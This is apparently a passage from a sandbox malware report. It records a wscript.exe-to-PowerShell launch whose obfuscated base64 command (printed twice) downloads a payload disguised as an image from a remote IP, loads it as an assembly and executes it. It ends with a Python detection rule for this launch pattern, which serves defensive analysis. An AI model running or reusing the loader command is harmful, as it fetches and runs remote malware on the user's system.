'J#Bz#HQ#dQBu#HQ#aQBu#GU#cwBz#C##PQ#g#Cc#d#B4#HQ#LgBy#G8#ZgBl#HI#ZQBo#G4#bwBz#Gc#bgBp#Gg#d#B0#HM#ZQBi#HQ#ZQBn#HI#bwBm#GU#cgBo#HQ#ZQBn#G8#d#Bl#HY#bwBs#GU#cgBh#Gg#cwBl#Hc#LwBv#GM#YgBr#C8#c#Bw#G0#YQB4#C8#N##4#DE#Lg#0#DQ#MQ#u#Dg#N##y#C4#OQ#w#DE#Lw#v#Do#c#B0#HQ#a##n#Ds#J#By#GU#YwBv#Gw#b#Bp#GQ#aQBu#Gc#I##9#C##J#Bz#HQ#dQBu#HQ#aQBu#GU#cwBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bi#GU#YgBs#GE#cwB0#C##PQ#g#Cc#a#B0#HQ#c##6#C8#Lw#x#D##OQ#u#DI#N##4#C4#MQ#0#DQ#Lg#x#Dg#N##v#Hg#YQBt#H##c##v#HY#Yg#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#Z#Bl#HM#YwB1#HI#YQBp#G4#aQBh#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#cgBh#GI#ZQBz#HE#dQBl#GQ#I##9#C##J#Bk#GU#cwBj#HU#cgBh#Gk#bgBp#GE#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#YgBl#GI#b#Bh#HM#d##p#Ds#J#B0#Hc#ZQBy#Gs#aQBu#Gc#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#HI#YQBi#GU#cwBx#HU#ZQBk#Ck#Ow#k#H##ZQBz#GM#YQBk#Gk#d#Bv#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bm#HU#cwBp#G8#bgBs#GU#cwBz#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#GY#bwBy#GU#ZgBl#G4#Z#Bp#G4#Zw#g#D0#I##k#HQ#dwBl#HI#awBp#G4#Zw#u#Ek#bgBk#GU#e#BP#GY#K##k#H##ZQBz#GM#YQBk#Gk#d#Bv#Ck#Ow#k#GM#cgBv#Hk#b#Bz#HQ#bwBu#GU#I##9#C##J#B0#Hc#ZQBy#Gs#aQBu#Gc#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bm#HU#cwBp#G8#bgBs#GU#cwBz#Ck#Ow#k#GY#bwBy#GU#ZgBl#G4#Z#Bp#G4#Zw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GM#cgBv#Hk#b#Bz#HQ#bwBu#GU#I##t#Gc#d##g#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Ds#J#Bm#G8#cgBl#GY#ZQBu#GQ#aQBu#Gc#I##r#D0#I##k#H##ZQBz#GM#YQBk#Gk#d#Bv#C4#T#Bl#G4#ZwB0#Gg#Ow#k#H##bwBv#Gw#a#Bv#HU#cwBl#HM#I##9#C##J#Bj#HI#bwB5#Gw#cwB0#G8#bgBl#C##LQ#g#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Ds#J#Bz#G8#bQBl#HM#d#Bo#GU#cwBp#HM#I##9#C##J#B0#Hc#ZQBy#Gs#aQBu#Gc#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Cw#I##k#H##bwBv#Gw#a
#Bv#HU#cwBl#HM#KQ#7#CQ#cwBw#G8#cgBp#GM#aQBk#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bz#G8#bQBl#HM#d#Bo#GU#cwBp#HM#KQ#7#CQ#YwBv#G4#bgBp#HY#YQBu#GM#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#HM#c#Bv#HI#aQBj#Gk#Z#Bl#HM#KQ#7#CQ#cgBp#G4#ZwBi#GU#YQBy#GU#cg#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#ZQBj#G8#b#Bs#Gk#Z#Bp#G4#Zw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Mg#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
parent_process wscript.exe martian_process powershell -NoProfile -Command "$Codigo = 'J#Bz#HQ#dQBu#HQ#aQBu#GU#cwBz#C##PQ#g#Cc#d#B4#HQ#LgBy#G8#ZgBl#HI#ZQBo#G4#bwBz#Gc#bgBp#Gg#d#B0#HM#ZQBi#HQ#ZQBn#HI#bwBm#GU#cgBo#HQ#ZQBn#G8#d#Bl#HY#bwBs#GU#cgBh#Gg#cwBl#Hc#LwBv#GM#YgBr#C8#c#Bw#G0#YQB4#C8#N##4#DE#Lg#0#DQ#MQ#u#Dg#N##y#C4#OQ#w#DE#Lw#v#Do#c#B0#HQ#a##n#Ds#J#By#GU#YwBv#Gw#b#Bp#GQ#aQBu#Gc#I##9#C##J#Bz#HQ#dQBu#HQ#aQBu#GU#cwBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bi#GU#YgBs#GE#cwB0#C##PQ#g#Cc#a#B0#HQ#c##6#C8#Lw#x#D##OQ#u#DI#N##4#C4#MQ#0#DQ#Lg#x#Dg#N##v#Hg#YQBt#H##c##v#HY#Yg#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#Z#Bl#HM#YwB1#HI#YQBp#G4#aQBh#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#cgBh#GI#ZQBz#HE#dQBl#GQ#I##9#C##J#Bk#GU#cwBj#HU#cgBh#Gk#bgBp#GE#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#YgBl#GI#b#Bh#HM#d##p#Ds#J#B0#Hc#ZQBy#Gs#aQBu#Gc#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#HI#YQBi#GU#cwBx#HU#ZQBk#Ck#Ow#k#H##ZQBz#GM#YQBk#Gk#d#Bv#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bm#HU#cwBp#G8#bgBs#GU#cwBz#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#GY#bwBy#GU#ZgBl#G4#Z#Bp#G4#Zw#g#D0#I##k#HQ#dwBl#HI#awBp#G4#Zw#u#Ek#bgBk#GU#e#BP#GY#K##k#H##ZQBz#GM#YQBk#Gk#d#Bv#Ck#Ow#k#GM#cgBv#Hk#b#Bz#HQ#bwBu#GU#I##9#C##J#B0#Hc#ZQBy#Gs#aQBu#Gc#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bm#HU#cwBp#G8#bgBs#GU#cwBz#Ck#Ow#k#GY#bwBy#GU#ZgBl#G4#Z#Bp#G4#Zw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GM#cgBv#Hk#b#Bz#HQ#bwBu#GU#I##t#Gc#d##g#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Ds#J#Bm#G8#cgBl#GY#ZQBu#GQ#aQBu#Gc#I##r#D0#I##k#H##ZQBz#GM#YQBk#Gk#d#Bv#C4#T#Bl#G4#ZwB0#Gg#Ow#k#H##bwBv#Gw#a#Bv#HU#cwBl#HM#I##9#C##J#Bj#HI#bwB5#Gw#cwB0#G8#bgBl#C##LQ#g#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Ds#J#Bz#G8#bQBl#HM#d#Bo#GU#cwBp#HM#I##9#C##J#B0#Hc#ZQBy#Gs#aQBu#Gc#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Cw#I##k#H##bwBv#Gw#a#Bv#HU#cwBl#HM#KQ#7#CQ#cwBw#G8#cgBp#GM#aQBk#GU#cw
#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bz#G8#bQBl#HM#d#Bo#GU#cwBp#HM#KQ#7#CQ#YwBv#G4#bgBp#HY#YQBu#GM#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#HM#c#Bv#HI#aQBj#Gk#Z#Bl#HM#KQ#7#CQ#cgBp#G4#ZwBi#GU#YQBy#GU#cg#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#ZQBj#G8#b#Bs#Gk#Z#Bp#G4#Zw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Mg#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
option -noprofile value Does not load current user profile
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
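Detection logic for the process hand-off the sandbox tags as a martian process above: wscript.exe starting powershell.exe with -NoProfile -Command and an inline decode-and-evaluate chain (`FromBase64String`, `.Replace(`, `Unicode.GetString`, `Invoke-Expression`, all taken from the command line recorded on this page). This is an added example, not part of the report. The event shape (parent image, image, command line) and the two sample events are constructed: the first mirrors the launch on this page with the blob shortened, the second is a benign administrative call that must not fire. In production the same predicate belongs on process-creation telemetry such as Sysmon Event ID 1 or Windows Security event 4688 with command-line auditing enabled.

```python
"""Process-creation detection for the wscript.exe -> powershell.exe launch
pattern recorded in this report.  Three independent signals are scored so
that a variant which renames a variable or changes the placeholder character
still trips at least one of them.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (field names are the example's own)."""
    parent_image: str
    image: str
    command_line: str


SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")
# Tokens lifted from the launcher command line on this page, lower-cased.
DECODE_MARKERS = (
    "frombase64string",
    ".replace(",
    "unicode.getstring",
    "invoke-expression",
)
# A long single-quoted run of base64-like characters (with or without '#').
LONG_BLOB_RE = re.compile(r"'[A-Za-z0-9+/=#]{200,}'")


def basename(path: str) -> str:
    """Image name without directory, lower-cased; accepts either slash."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_reasons(ev: ProcEvent) -> list[str]:
    """Return the reasons this event matches; an empty list means no alert."""
    reasons = []
    if basename(ev.image) not in POWERSHELL:
        return reasons
    cmd = ev.command_line.lower()
    parent = basename(ev.parent_image)
    if parent in SCRIPT_HOSTS:
        reasons.append(f"powershell spawned by script host {parent}")
    hits = [m for m in DECODE_MARKERS if m in cmd]
    if len(hits) >= 3:
        reasons.append("inline decode-and-eval chain: " + ", ".join(hits))
    if "-noprofile" in cmd and "-command" in cmd and LONG_BLOB_RE.search(ev.command_line):
        reasons.append("long quoted blob passed via -NoProfile -Command")
    return reasons


# Constructed events: (1) the shape of the launch in this report, blob
# shortened to a repeated fragment; (2) an ordinary admin invocation.
SAMPLE_EVENTS = [
    ProcEvent(
        parent_image=r"C:\Windows\System32\wscript.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line=(
            "powershell.exe -NoProfile -Command \"$Codigo = '"
            + "J#Bz#HQ#dQBu" * 20
            + "'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString("
            "[Convert]::FromBase64String($Codigo.Replace('#','A'))); "
            "Invoke-Expression $OWjuxd\""
        ),
    ),
    ProcEvent(
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line="powershell.exe -NoProfile -Command \"Get-Service | "
                     "Where-Object Status -eq 'Running'\"",
    ),
]


def scan(events) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event that matched at least one signal."""
    return [(i, r) for i, ev in enumerate(events) if (r := match_reasons(ev))]


if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_EVENTS):
        print(f"event {index}:")
        for reason in reasons:
            print("  -", reason)
```

The three signals are deliberately separable: the parent/child pair alone is a strong indicator for a .vbs lure, the marker set survives renamed variables, and the blob-length check survives a change of placeholder character. Tune the 200-character threshold to your environment; signed deployment scripts rarely pass a quoted blob that long on the command line, but some configuration-management tools do.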